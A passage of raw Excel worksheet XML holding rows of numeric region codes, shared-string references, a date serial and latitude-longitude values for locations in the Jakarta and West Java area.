      </c>
      <c r="Q615" t="s">
        <v>483</v>
      </c>
      <c r="R615" t="s">
        <v>484</v>
      </c>
      <c r="S615" t="s">
        <v>108</v>
      </c>
      <c r="T615" t="s">
        <v>33</v>
      </c>
      <c r="U615" s="5">
        <v>10682712</v>
      </c>
      <c r="V615" s="5" t="s">
        <v>15026</v>
      </c>
      <c r="W615" s="5">
        <v>-629467</v>
      </c>
      <c r="X615" t="s">
        <v>18831</v>
      </c>
      <c r="Y615" t="str">
        <f t="shared" si="9"/>
        <v>-6.29467,106.82712</v>
      </c>
    </row>
    <row r="616" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A616">
        <v>105847</v>
      </c>
      <c r="B616" s="1">
        <v>43877</v>
      </c>
      <c r="C616">
        <v>1</v>
      </c>
      <c r="D616" t="s">
        <v>22</v>
      </c>
      <c r="E616" t="s">
        <v>23</v>
      </c>
      <c r="F616" t="s">
        <v>2644</v>
      </c>
      <c r="H616" t="s">
        <v>26</v>
      </c>
      <c r="I616" t="s">
        <v>1559</v>
      </c>
      <c r="J616" t="s">
        <v>2608</v>
      </c>
      <c r="L616" t="s">
        <v>2645</v>
      </c>
      <c r="M616">
        <v>3313150010</v>
      </c>
      <c r="N616">
        <v>3313150</v>
      </c>
      <c r="O616">
        <v>3313</v>
      </c>
      <c r="P616">
        <v>33</v>
      </c>
      <c r="Q616" t="s">
        <v>2646</v>
      </c>
      <c r="R616" t="s">
        <v>2055</v>
      </c>
      <c r="S616" t="s">
        <v>2056</v>
      </c>
      <c r="T616" t="s">
        <v>1134</v>
      </c>
      <c r="U616" s="5">
        <v>11103058</v>
      </c>
      <c r="V616" s="5" t="s">
        <v>15027</v>
      </c>
      <c r="W616" s="5">
        <v>-756110</v>
      </c>
      <c r="X616" t="s">
        <v>18832</v>
      </c>
      <c r="Y616" t="str">
        <f t="shared" si="9"/>
        <v>-7.56110,111.03058</v>
      </c>
    </row>
    <row r="617" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A617">
        <v>105848</v>
      </c>
      <c r="B617" s="1">
        <v>43877</v>
      </c>
      <c r="C617">
        <v>1</v>
      </c>
      <c r="D617" t="s">
        <v>22</v>
      </c>
      <c r="E617" t="s">
        <v>23</v>
      </c>
      <c r="F617" t="s">
        <v>2647</v>
      </c>
      <c r="H617" t="s">
        <v>26</v>
      </c>
      <c r="I617" t="s">
        <v>166</v>
      </c>
      <c r="J617" t="s">
        <v>2627</v>
      </c>
      <c r="L617" t="s">
        <v>250</v>
      </c>
      <c r="M617">
        <v>3204140004</v>
      </c>
      <c r="N617">
        <v>3204140</v>
      </c>
      <c r="O617">
        <v>3204</v>
      </c>
      <c r="P617">
        <v>32</v>
      </c>
      <c r="Q617" t="s">
        <v>1731</v>
      </c>
      <c r="R617" t="s">
        <v>1732</v>
      </c>
      <c r="S617" t="s">
        <v>1464</v>
      </c>
      <c r="T617" t="s">
        <v>42</v>
      </c>
      <c r="U617" s="5">
        <v>10762508</v>
      </c>
      <c r="V617" s="5" t="s">
        <v>15028</v>
      </c>
      <c r="W617" s="5">
        <v>-699139</v>
      </c>
      <c r="X617" t="s">
        <v>18833</v>
      </c>
      <c r="Y617" t="str">
        <f t="shared" si="9"/>
        <v>-6.99139,107.62508</v>
      </c>
    </row>
    <row r="618" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A618">
        <v>105853</v>
      </c>
      <c r="B618" s="1">
        <v>43877</v>
      </c>
      <c r="C618">
        <v>1</v>
      </c>
      <c r="D618" t="s">
        <v>2648</v>
      </c>
      <c r="E618" t="s">
        <v>23</v>
      </c>
      <c r="G618" t="s">
        <v>2649</v>
      </c>
      <c r="H618" t="s">
        <v>26</v>
      </c>
      <c r="J618" t="s">
        <v>2580</v>
      </c>
      <c r="L618" t="s">
        <v>2650</v>
      </c>
      <c r="M618">
        <v>3172040005</v>
      </c>
      <c r="N618">
        <v>3172040</v>
      </c>
      <c r="O618">
        <v>3172</v>
      </c>
      <c r="P618">
        <v>31</v>
      </c>
      <c r="Q618" t="s">
        <v>1351</v>
      </c>
      <c r="R618" t="s">
        <v>281</v>
      </c>
      <c r="S618" t="s">
        <v>49</v>
      </c>
      <c r="T618" t="s">
        <v>33</v>
      </c>
      <c r="U618" s="5">
        <v>10689384</v>
      </c>
      <c r="V618" s="5" t="s">
        <v>15029</v>
      </c>
      <c r="W618" s="5">
        <v>-624100</v>
      </c>
      <c r="X618" t="s">
        <v>18834</v>
      </c>
      <c r="Y618" t="str">
        <f t="shared" si="9"/>
        <v>-6.24100,106.89384</v>
      </c>
    </row>
    <row r="619" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A619">
        <v>105855</v>
      </c>
      <c r="B619" s="1">
        <v>43877</v>
      </c>
      <c r="C619">
        <v>1</v>
      </c>
      <c r="D619" t="s">
        <v>2648</v>
      </c>
      <c r="E619" t="s">
        <v>23</v>
      </c>
      <c r="G619" t="s">
        <v>2649</v>
      </c>
      <c r="H619" t="s">
        <v>26</v>
      </c>
      <c r="J619" t="s">
        <v>2580</v>
      </c>
      <c r="L619" t="s">
        <v>2650</v>
      </c>
      <c r="M619">
        <v>3172040005</v>
      </c>
      <c r="N619">
        <v>3172040</v>
      </c>
      <c r="O619">
        <v>3172</v>
      </c>
      <c r="P619">
        <v>31</v>
      </c>
      <c r="Q619" t="s">
        <v>1351</v>
      </c>
      <c r="R619" t="s">
        <v>281</v>
      </c>
      <c r="S619" t="s">
        <v>49</v>
      </c>
      <c r="T619" t="s">
        <v>33</v>
      </c>
      <c r="U619" s="5">
        <v>10689384</v>
      </c>
      <c r="V619" s="5" t="s">
        <v>15029</v>
      </c>
      <c r="W619" s="5">
        <v>-624100</v>
      </c>
      <c r="X619" t="s">
        <v>18834</v>
      </c>
      <c r="Y619" t="str">
        <f t="shared" si="9"/>
        <v>-6.24100,106.89384</v>
      </c>
    </row>
    <row r="620" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A620">
        <v>105857</v>
      </c>
      <c r="B620" s="1">
        <v>43877</v>
      </c>
      <c r="C620">
        <v>1</v>
      </c>
      <c r="D620" t="s">
        <v>2648</v>
      </c>
      <c r="E620" t="s">
        <v>23</v>
      </c>
      <c r="G620" t="s">
        <v>2649</v>
      </c>
      <c r="H620" t="s">
        <v>26</v>
      </c>
      <c r="J620" t="s">
        <v>2580</v>
      </c>
      <c r="L620" t="s">
        <v>2650</v>
      </c>
      <c r="M620">
        <v>3172040005</v>
      </c>
      <c r="N620">
        <v>3172040</v>
      </c>
      <c r="O620">
        <v>3172</v>
      </c>
      <c r="P620">
        <v>31</v>
      </c>
      <c r="Q620" t="s">
        <v>1351</v>
      </c>
      <c r="R620" t="s">
        <v>281</v>
      </c>
      <c r="S620" t="s">
        <v>49</v>
      </c>
      <c r="T620" t="s">
        <v>33</v>
      </c>
      <c r="U620" s="5">
        <v>10689384</v>
      </c>
      <c r="V620" s="5" t="s">
        <v>15029</v>
      </c>
      <c r="W620" s="5">
        <v>-624100</v>
      </c>
      <c r="X620" t="s">
        <v>18834</v>
      </c>
      <c r="Y620" t="str">
        <f t="shared" si="9"/>
        <v>-6.24100,106.89384</v>
      </c>
    </row>
    <row r="621" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A621">
        <v>105859</v>
      </c>
      <c r="B621" s="1">
        <v>43877</v>
      </c>
      <c r="C621">
        <v>1</v>
      </c>
      <c r="D621" t="s">
        <v>2648</v>
      </c>
      <c r="E621" t="s">
        <v>23</v>
      </c>
      <c r="G621" t="s">
        <v>2649</v>
      </c>
      <c r="H621" t="s">
        <v>26</v>
      </c>
      <c r="J621" t="s">
        <v>2580</v>
      </c>
      <c r="L621" t="s">
        <v>2650</v>
      </c>
      <c r="M621">
        <v>3172040005</v>
      </c>
      <c r="N621">
        <v>3172040</v>
      </c>
      <c r="O621">
        <v>3172</v>
      </c>
      <c r="P621">
        <v>31</v>
      </c>
      <c r="Q621" t="s">
        <v>1351</v>
      </c>
      <c r="R621" t="s">
        <v>281</v>
      </c>
      <c r="S621" t="s">
        <v>49</v>
      </c>
      <c r="T621" t="s">
        <v>33</v>
      </c>
      <c r="U621" s="5">
        <v>10689384</v>
      </c>
      <c r="V621" s="5" t="s">
        <v>15029</v>
      </c>
      <c r="W621" s="5">
        <v>-624100</v>
      </c>
      <c r="X621" t="s">
        <v>18834</v>
      </c>
      <c r="Y621" t="str">
        <f t="shared" si="9"/>
        <v>-6.24100,106.89384</v>
      </c>
    </row>
    <row r="622" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A622">
        <v>105861</v>
      </c>
      <c r="B622" s="1">
        <v>43877</v>
      </c>
      <c r="C622">
        <v>1</v>
      </c>
      <c r="D622" t="s">
        <v>2648</v>
      </c>
      <c r="E622" t="s">
        <v>23</v>
      </c>
      <c r="G622" t="s">
        <v>2651</v>
      </c>
      <c r="H622" t="s">
        <v>26</v>
      </c>
      <c r="J622" t="s">
        <v>2580</v>
      </c>
      <c r="L622" t="s">
        <v>2652</v>
      </c>
      <c r="M622">
        <v>3172040005</v>
      </c>
      <c r="N622">
        <v>3172040</v>
      </c>
      <c r="O622">
        <v>3172</v>
      </c>
      <c r="P622">
        <v>31</v>
      </c>
      <c r="Q622" t="s">
        <v>1351</v>
      </c>
      <c r="R622" t="s">
        <v>281</v>
      </c>
      <c r="S622" t="s">
        <v>49</v>
      </c>
      <c r="T622" t="s">
        <v>33</v>
      </c>
      <c r="U622" s="5">
        <v>10689370</v>
      </c>
      <c r="V622" s="5" t="s">
        <v>15030</v>
      </c>
      <c r="W622" s="5">
        <v>-624105</v>
      </c>
      <c r="X622" t="s">
        <v>18835</v>
      </c>
      <c r="Y622" t="str">
        <f t="shared" si="9"/>
        <v>-6.24105,106.89370</v>
      </c>
    </row>
    <row r="623" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A623">
        <v>105862</v>
      </c>
      <c r="B623" s="1">
        <v>43877</v>
      </c>
      <c r="C623">
        <v>1</v>
      </c>
      <c r="D623" t="s">
        <v>2648</v>
      </c>
      <c r="E623" t="s">
        <v>23</v>
      </c>
      <c r="G623" t="s">
        <v>2653</v>
      </c>
      <c r="H623" t="s">
        <v>26</v>
      </c>
      <c r="J623" t="s">
        <v>2654</v>
      </c>
      <c r="L623" t="s">
        <v>2655</v>
      </c>
      <c r="M623">
        <v>3174080004</v>
      </c>
      <c r="N623">
        <v>3174080</v>
      </c>
      <c r="O623">
        <v>3174</v>
      </c>
      <c r="P623">
        <v>31</v>
      </c>
      <c r="Q623" t="s">
        <v>1696</v>
      </c>
      <c r="R623" t="s">
        <v>695</v>
      </c>
      <c r="S623" t="s">
        <v>32</v>
      </c>
      <c r="T623" t="s">
        <v>33</v>
      </c>
      <c r="U623" s="5">
        <v>10672591</v>
      </c>
      <c r="V623" s="5" t="s">
        <v>15031</v>
      </c>
      <c r="W623" s="5">
        <v>-611647</v>
      </c>
      <c r="X623" t="s">
        <v>18836</v>
      </c>
      <c r="Y623" t="str">
        <f t="shared" si="9"/>
        <v>-6.11647,106.72591</v>
      </c>
    </row>
    <row r="624" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A624">
        <v>105863</v>
      </c>
      <c r="B624" s="1">
        <v>43877</v>
      </c>
      <c r="C624">
        <v>1</v>
      </c>
      <c r="D624" t="s">
        <v>2648</v>
      </c>
      <c r="E624" t="s">
        <v>23</v>
      </c>
      <c r="G624" t="s">
        <v>2656</v>
      </c>
      <c r="H624" t="s">
        <v>26</v>
      </c>
      <c r="J624" t="s">
        <v>2657</v>
      </c>
      <c r="L624" t="s">
        <v>2658</v>
      </c>
      <c r="M624">
        <v>3172070003</v>
      </c>
      <c r="N624">
        <v>3172070</v>
      </c>
      <c r="O624">
        <v>3172</v>
      </c>
      <c r="P624">
        <v>31</v>
      </c>
      <c r="Q624" t="s">
        <v>2659</v>
      </c>
      <c r="R624" t="s">
        <v>128</v>
      </c>
      <c r="S624" t="s">
        <v>49</v>
      </c>
      <c r="T624" t="s">
        <v>33</v>
      </c>
      <c r="U624" s="5">
        <v>10693105</v>
      </c>
      <c r="V624" s="5" t="s">
        <v>15032</v>
      </c>
      <c r="W624" s="5">
        <v>-623902</v>
      </c>
      <c r="X624" t="s">
        <v>18837</v>
      </c>
      <c r="Y624" t="str">
        <f t="shared" si="9"/>
        <v>-6.23902,106.93105</v>
      </c>
    </row>
    <row r="625" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A625">
        <v>106395</v>
      </c>
      <c r="B625" s="1">
        <v>43877</v>
      </c>
      <c r="C625">
        <v>1</v>
      </c>
      <c r="D625" t="s">
        <v>2648</v>
      </c>
      <c r="E625" t="s">
        <v>23</v>
      </c>
      <c r="G625" t="s">
        <v>2660</v>
      </c>
      <c r="H625" t="s">
        <v>26</v>
      </c>
      <c r="J625" t="s">
        <v>2661</v>
      </c>
      <c r="L625" t="s">
        <v>2662</v>
      </c>
      <c r="M625">
        <v>3174080005</v>
      </c>
      <c r="N625">
        <v>3174080</v>
      </c>
      <c r="O625">
        <v>3174</v>
      </c>
      <c r="P625">
        <v>31</v>
      </c>
      <c r="Q625" t="s">
        <v>2663</v>
      </c>
      <c r="R625" t="s">
        <v>695</v>
      </c>
      <c r="S625" t="s">
        <v>32</v>
      </c>
      <c r="T625" t="s">
        <v>33</v>
      </c>
      <c r="U625" s="5">
        <v>10670778</v>
      </c>
      <c r="V625" s="5" t="s">
        <v>15033</v>
      </c>
      <c r="W625" s="5">
        <v>-609908</v>
      </c>
      <c r="X625" t="s">
        <v>18838</v>
      </c>
      <c r="Y625" t="str">
        <f t="shared" si="9"/>
        <v>-6.09908,106.70778</v>
      </c>
    </row>
    <row r="626" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A626">
        <v>106402</v>
      </c>
      <c r="B626" s="1">
        <v>43877</v>
      </c>
      <c r="C626">
        <v>1</v>
      </c>
      <c r="D626" t="s">
        <v>2648</v>
      </c>
      <c r="E626" t="s">
        <v>23</v>
      </c>
      <c r="G626" t="s">
        <v>2664</v>
      </c>
      <c r="H626" t="s">
        <v>26</v>
      </c>
      <c r="J626" t="s">
        <v>2665</v>
      </c>
      <c r="L626" t="s">
        <v>2666</v>
      </c>
      <c r="M626">
        <v>3175020003</v>
      </c>
      <c r="N626">
        <v>3175020</v>
      </c>
      <c r="O626">
        <v>3175</v>
      </c>
      <c r="P626">
        <v>31</v>
      </c>
      <c r="Q626" t="s">
        <v>2667</v>
      </c>
      <c r="R626" t="s">
        <v>2228</v>
      </c>
      <c r="S626" t="s">
        <v>547</v>
      </c>
      <c r="T626" t="s">
        <v>33</v>
      </c>
      <c r="U626" s="5">
        <v>10681190</v>
      </c>
      <c r="V626" s="5" t="s">
        <v>15034</v>
      </c>
      <c r="W626" s="5">
        <v>-613037</v>
      </c>
      <c r="X626" t="s">
        <v>18839</v>
      </c>
      <c r="Y626" t="str">
        <f t="shared" si="9"/>
        <v>-6.13037,106.81190</v>
      </c>
    </row>
    <row r="627" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A627">
        <v>106403</v>
      </c>
      <c r="B627" s="1">
        <v>43877</v>
      </c>
      <c r="C627">
        <v>1</v>
      </c>
      <c r="D627" t="s">
        <v>2648</v>
      </c>
      <c r="E627" t="s">
        <v>23</v>
      </c>
      <c r="G627" t="s">
        <v>2668</v>
      </c>
      <c r="H627" t="s">
        <v>26</v>
      </c>
      <c r="J627" t="s">
        <v>2669</v>
      </c>
      <c r="L627" t="s">
        <v>2670</v>
      </c>
      <c r="M627">
        <v>3174070002</v>
      </c>
      <c r="N627">
        <v>3174070</v>
      </c>
      <c r="O627">
        <v>3174</v>
      </c>
      <c r="P627">
        <v>31</v>
      </c>
      <c r="Q627" t="s">
        <v>621</v>
      </c>
      <c r="R627" t="s">
        <v>84</v>
      </c>
      <c r="S627" t="s">
        <v>32</v>
      </c>
      <c r="T627" t="s">
        <v>33</v>
      </c>
      <c r="U627" s="5">
        <v>10673840</v>
      </c>
      <c r="V627" s="5" t="s">
        <v>15035</v>
      </c>
      <c r="W627" s="5">
        <v>-616441</v>
      </c>
      <c r="X627" t="s">
        <v>18840</v>
      </c>
      <c r="Y627" t="str">
        <f t="shared" si="9"/>
        <v>-6.16441,106.73840</v>
      </c>
    </row>
    <row r="628" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A628">
        <v>107000</v>
      </c>
      <c r="B628" s="1">
        <v>43877</v>
      </c>
      <c r="C628">
        <v>1</v>
      </c>
      <c r="D628" t="s">
        <v>2648</v>
      </c>
      <c r="E628" t="s">
        <v>23</v>
      </c>
      <c r="G628" t="s">
        <v>2671</v>
      </c>
      <c r="H628" t="s">
        <v>26</v>
      </c>
      <c r="J628" t="s">
        <v>2672</v>
      </c>
      <c r="L628" t="s">
        <v>2673</v>
      </c>
      <c r="M628">
        <v>3175060002</v>
      </c>
      <c r="N628">
        <v>3175060</v>
      </c>
      <c r="O628">
        <v>3175</v>
      </c>
      <c r="P628">
        <v>31</v>
      </c>
      <c r="Q628" t="s">
        <v>2674</v>
      </c>
      <c r="R628" t="s">
        <v>2279</v>
      </c>
      <c r="S628" t="s">
        <v>547</v>
      </c>
      <c r="T628" t="s">
        <v>33</v>
      </c>
      <c r="U628" s="5">
        <v>10695104</v>
      </c>
      <c r="V628" s="5" t="s">
        <v>15036</v>
      </c>
      <c r="W628" s="5">
        <v>-616326</v>
      </c>
      <c r="X628" t="s">
        <v>18841</v>
      </c>
      <c r="Y628" t="str">
        <f t="shared" si="9"/>
        <v>-6.16326,106.95104</v>
      </c>
    </row>
    <row r="629" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A629">
        <v>107125</v>
      </c>
      <c r="B629" s="1">
        <v>43877</v>
      </c>
      <c r="C629">
        <v>1</v>
      </c>
      <c r="D629" t="s">
        <v>2648</v>
      </c>
      <c r="E629" t="s">
        <v>23</v>
      </c>
      <c r="G629" t="s">
        <v>2675</v>
      </c>
      <c r="H629" t="s">
        <v>26</v>
      </c>
      <c r="J629" t="s">
        <v>2676</v>
      </c>
      <c r="L629" t="s">
        <v>2677</v>
      </c>
      <c r="M629">
        <v>3174080005</v>
      </c>
      <c r="N629">
        <v>3174080</v>
      </c>
      <c r="O629">
        <v>3174</v>
      </c>
      <c r="P629">
        <v>31</v>
      </c>
      <c r="Q629" t="s">
        <v>2663</v>
      </c>
      <c r="R629" t="s">
        <v>695</v>
      </c>
      <c r="S629" t="s">
        <v>32</v>
      </c>
      <c r="T629" t="s">
        <v>33</v>
      </c>
      <c r="U629" s="5">
        <v>10670008</v>
      </c>
      <c r="V629" s="5" t="s">
        <v>15037</v>
      </c>
      <c r="W629" s="5">
        <v>-609690</v>
      </c>
      <c r="X629" t="s">
        <v>18842</v>
      </c>
      <c r="Y629" t="str">
        <f t="shared" si="9"/>
        <v>-6.09690,106.70008</v>
      </c>
    </row>
    <row r="630" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A630">
        <v>107463</v>
      </c>
      <c r="B630" s="1">
        <v>43877</v>
      </c>
      <c r="C630">
        <v>1</v>
      </c>
      <c r="D630" t="s">
        <v>2648</v>
      </c>
      <c r="E630" t="s">
        <v>23</v>
      </c>
      <c r="G630" t="s">
        <v>2678</v>
      </c>
      <c r="H630" t="s">
        <v>26</v>
      </c>
      <c r="J630" t="s">
        <v>2679</v>
      </c>
      <c r="L630" t="s">
        <v>2680</v>
      </c>
      <c r="M630">
        <v>3172090001</v>
      </c>
      <c r="N630">
        <v>3172090</v>
      </c>
      <c r="O630">
        <v>3172</v>
      </c>
      <c r="P630">
        <v>31</v>
      </c>
      <c r="Q630" t="s">
        <v>2681</v>
      </c>
      <c r="R630" t="s">
        <v>890</v>
      </c>
      <c r="S630" t="s">
        <v>49</v>
      </c>
      <c r="T630" t="s">
        <v>33</v>
      </c>
      <c r="U630" s="5">
        <v>10687637</v>
      </c>
      <c r="V630" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W630" s="5">
        <v>-620737</v>
      </c>
      <c r="X630" t="s">
        <v>18843</v>
      </c>
      <c r="Y630" t="str">
        <f t="shared" si="9"/>
        <v>-6.20737,106.87637</v>
      </c>
    </row>
    <row r="631" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A631">
        <v>107563</v>
      </c>
      <c r="B631" s="1">
        <v>43877</v>
      </c>
      <c r="C631">
        <v>1</v>
      </c>
      <c r="D631" t="s">
        <v>2648</v>
      </c>
      <c r="E631" t="s">
        <v>23</v>
      </c>
      <c r="G631" t="s">
        <v>2682</v>
      </c>
      <c r="H631" t="s">
        <v>26</v>
      </c>
      <c r="J631" t="s">
        <v>2683</v>
      </c>
      <c r="L631" t="s">
        <v>2684</v>
      </c>
      <c r="M631">
        <v>3172070002</v>
      </c>
      <c r="N631">
        <v>3172070</v>
      </c>
      <c r="O631">
        <v>3172</v>
      </c>
      <c r="P631">
        <v>31</v>
      </c>
      <c r="Q631" t="s">
        <v>128</v>
      </c>
      <c r="R631" t="s">
        <v>128</v>
      </c>
      <c r="S631" t="s">
        <v>49</v>
      </c>
      <c r="T631" t="s">
        <v>33</v>
      </c>
      <c r="U631" s="5">
        <v>10691517</v>
      </c>
      <c r="V631" s="5" t="s">
        <v>15039</v>
      </c>
      <c r="W631" s="5">
        <v>-624663</v>
      </c>
      <c r="X631" t="s">
        <v>18844</v>
      </c>
      <c r="Y631" t="str">
        <f t="shared" si="9"/>
        <v>-6.24663,106.91517</v>
      </c>
    </row>
    <row r="632" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A632">
        <v>107636</v>
      </c>
      <c r="B632" s="1">
        <v>43877</v>
      </c>
      <c r="C632">
        <v>1</v>
      </c>
      <c r="D632" t="s">
        <v>2648</v>
      </c>
      <c r="E632" t="s">
        <v>23</v>
      </c>
      <c r="G632" t="s">
        <v>2685</v>
      </c>
      <c r="H632" t="s">
        <v>26</v>
      </c>
      <c r="J632" t="s">
        <v>374</v>
      </c>
      <c r="L632" t="s">
        <v>2686</v>
      </c>
      <c r="M632">
        <v>3174040005</v>
      </c>
      <c r="N632">
        <v>3174040</v>
      </c>
      <c r="O632">
        <v>3174</v>
      </c>
      <c r="P632">
        <v>31</v>
      </c>
      <c r="Q632" t="s">
        <v>376</v>
      </c>
      <c r="R632" t="s">
        <v>377</v>
      </c>
      <c r="S632" t="s">
        <v>32</v>
      </c>
      <c r="T632" t="s">
        <v>33</v>
      </c>
      <c r="U632" s="5">
        <v>10678825</v>
      </c>
      <c r="V632" s="5" t="s">
        <v>15040</v>
      </c>
      <c r="W632" s="5">
        <v>-616400</v>
      </c>
      <c r="X632" t="s">
        <v>18845</v>
      </c>
      <c r="Y632" t="str">
        <f t="shared" si="9"/>
        <v>-6.16400,106.78825</v>
      </c>
    </row>
    <row r="633" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A633">
        <v>107730</v>
      </c>
      <c r="B633" s="1">
        <v>43877</v>
      </c>
      <c r="C633">
        <v>1</v>
      </c>
      <c r="D633" t="s">
        <v>2648</v>
      </c>
      <c r="E633" t="s">
        <v>23</v>
      </c>
      <c r="G633" t="s">
        <v>2687</v>
      </c>
      <c r="H633" t="s">
        <v>26</v>
      </c>
      <c r="J633" t="s">
        <v>2688</v>
      </c>
      <c r="L633" t="s">
        <v>2689</v>
      </c>
      <c r="M633">
        <v>3174070004</v>
      </c>
      <c r="N633">
        <v>3174070</v>
      </c>
      <c r="O633">
        <v>3174</v>
      </c>
      <c r="P633">
        <v>31</v>
      </c>
      <c r="Q633" t="s">
        <v>926</v>
      </c>
      <c r="R633" t="s">
        <v>84</v>
      </c>
      <c r="S633" t="s">
        <v>32</v>
      </c>
      <c r="T633" t="s">
        <v>33</v>
      </c>
      <c r="U633" s="5">
        <v>10674053</v>
      </c>
      <c r="V633" s="5" t="s">
        <v>15041</v>
      </c>
      <c r="W633" s="5">
        <v>-615009</v>
      </c>
      <c r="X633" t="s">
        <v>18846</v>
      </c>
      <c r="Y633" t="str">
        <f t="shared" si="9"/>
        <v>-6.15009,106.74053</v>
      </c>
    </row>
    <row r="634" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A634">
        <v>107781</v>
      </c>
      <c r="B634" s="1">
        <v>43877</v>
      </c>
      <c r="C634">
        <v>1</v>
      </c>
      <c r="D634" t="s">
        <v>2648</v>
      </c>
      <c r="E634" t="s">
        <v>23</v>
      </c>
      <c r="G634" t="s">
        <v>2690</v>
      </c>
      <c r="H634" t="s">
        <v>26</v>
      </c>
      <c r="J634" t="s">
        <v>2691</v>
      </c>
      <c r="L634" t="s">
        <v>2692</v>
      </c>
      <c r="M634">
        <v>3174080004</v>
      </c>
      <c r="N634">
        <v>3174080</v>
      </c>
      <c r="O634">
        <v>3174</v>
      </c>
      <c r="P634">
        <v>31</v>
      </c>
      <c r="Q634" t="s">
        <v>1696</v>
      </c>
      <c r="R634" t="s">
        <v>695</v>
      </c>
      <c r="S634" t="s">
        <v>32</v>
      </c>
      <c r="T634" t="s">
        <v>33</v>
      </c>
      <c r="U634" s="5">
        <v>10671404</v>
      </c>
      <c r="V634" s="5" t="s">
        <v>15042</v>
      </c>
      <c r="W634" s="5">
        <v>-611302</v>
      </c>
      <c r="X634" t="s">
        <v>18847</v>
      </c>
      <c r="Y634" t="str">
        <f t="shared" si="9"/>
        <v>-6.11302,106.71404</v>
      </c>
    </row>
    <row r="635" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A635">
        <v>107786</v>
      </c>
      <c r="B635" s="1">
        <v>43877</v>
      </c>
      <c r="C635">
        <v>1</v>
      </c>
      <c r="D635" t="s">
        <v>2648</v>
      </c>
      <c r="E635" t="s">
        <v>23</v>
      </c>
      <c r="G635" t="s">
        <v>2693</v>
      </c>
      <c r="H635" t="s">
        <v>26</v>
      </c>
      <c r="J635" t="s">
        <v>2691</v>
      </c>
      <c r="L635" t="s">
        <v>2694</v>
      </c>
      <c r="M635">
        <v>3174080004</v>
      </c>
      <c r="N635">
        <v>3174080</v>
      </c>
      <c r="O635">
        <v>3174</v>
      </c>
      <c r="P635">
        <v>31</v>
      </c>
      <c r="Q635" t="s">
        <v>1696</v>
      </c>
      <c r="R635" t="s">
        <v>695</v>
      </c>
      <c r="S635" t="s">
        <v>32</v>
      </c>
      <c r="T635" t="s">
        <v>33</v>
      </c>
      <c r="U635" s="5">
        <v>10671392</v>
      </c>
      <c r="V635" s="5" t="s">
        <v>15043</v>
      </c>
      <c r="W635" s="5">
        <v>-611293</v>
      </c>
      <c r="X635" t="s">
        <v>18848</v>
      </c>
      <c r="Y635" t="str">
        <f t="shared" si="9"/>
        <v>-6.11293,106.71392</v>
      </c>
    </row>
    <row r="636" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A636">
        <v>107963</v>
      </c>
      <c r="B636" s="1">
        <v>43877</v>
      </c>
      <c r="C636">
        <v>1</v>
      </c>
      <c r="D636" t="s">
        <v>2648</v>
      </c>
      <c r="E636" t="s">
        <v>23</v>
      </c>
      <c r="G636" t="s">
        <v>2695</v>
      </c>
      <c r="H636" t="s">
        <v>26</v>
      </c>
      <c r="J636" t="s">
        <v>2672</v>
      </c>
      <c r="L636" t="s">
        <v>2696</v>
      </c>
      <c r="M636">
        <v>3172080005</v>
      </c>
      <c r="N636">
        <v>3172080</v>
      </c>
      <c r="O636">
        <v>3172</v>
      </c>
      <c r="P636">
        <v>31</v>
      </c>
      <c r="Q636" t="s">
        <v>140</v>
      </c>
      <c r="R636" t="s">
        <v>141</v>
      </c>
      <c r="S636" t="s">
        <v>49</v>
      </c>
      <c r="T636" t="s">
        <v>33</v>
      </c>
      <c r="U636" s="5">
        <v>10695192</v>
      </c>
      <c r="V636" s="5" t="s">
        <v>15044</v>
      </c>
      <c r="W636" s="5">
        <v>-616351</v>
      </c>
      <c r="X636" t="s">
        <v>18849</v>
      </c>
      <c r="Y636" t="str">
        <f t="shared" si="9"/>
        <v>-6.16351,106.95192</v>
      </c>
    </row>
    <row r="637" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A637">
        <v>108303</v>
      </c>
      <c r="B637" s="1">
        <v>43877</v>
      </c>
      <c r="C637">
        <v>1</v>
      </c>
      <c r="D637" t="s">
        <v>2648</v>
      </c>
      <c r="E637" t="s">
        <v>23</v>
      </c>
      <c r="G637" t="s">
        <v>2697</v>
      </c>
      <c r="H637" t="s">
        <v>26</v>
      </c>
      <c r="J637" t="s">
        <v>2679</v>
      </c>
      <c r="L637" t="s">
        <v>2698</v>
      </c>
      <c r="M637">
        <v>3172090001</v>
      </c>
      <c r="N637">
        <v>3172090</v>
      </c>
      <c r="O637">
        <v>3172</v>
      </c>
      <c r="P637">
        <v>31</v>
      </c>
      <c r="Q637" t="s">
        <v>2681</v>
      </c>
      <c r="R637" t="s">
        <v>890</v>
      </c>
      <c r="S637" t="s">
        <v>49</v>
      </c>
      <c r="T637" t="s">
        <v>33</v>
      </c>
      <c r="U637" s="5">
        <v>10687637</v>
      </c>
      <c r="V637" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W637" s="5">
        <v>-620738</v>
      </c>
      <c r="X637" t="s">
        <v>18850</v>
      </c>
      <c r="Y637" t="str">
        <f t="shared" si="9"/>
        <v>-6.20738,106.87637</v>
      </c>
    </row>
    <row r="638" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A638">
        <v>108306</v>
      </c>
      <c r="B638" s="1">
        <v>43877</v>
      </c>
      <c r="C638">
        <v>1</v>
      </c>
      <c r="D638" t="s">
        <v>2648</v>
      </c>
      <c r="E638" t="s">
        <v>23</v>
      </c>
      <c r="G638" t="s">
        <v>2699</v>
      </c>
      <c r="H638" t="s">
        <v>26</v>
      </c>
      <c r="J638" t="s">
        <v>2679</v>
      </c>
      <c r="L638" t="s">
        <v>2700</v>
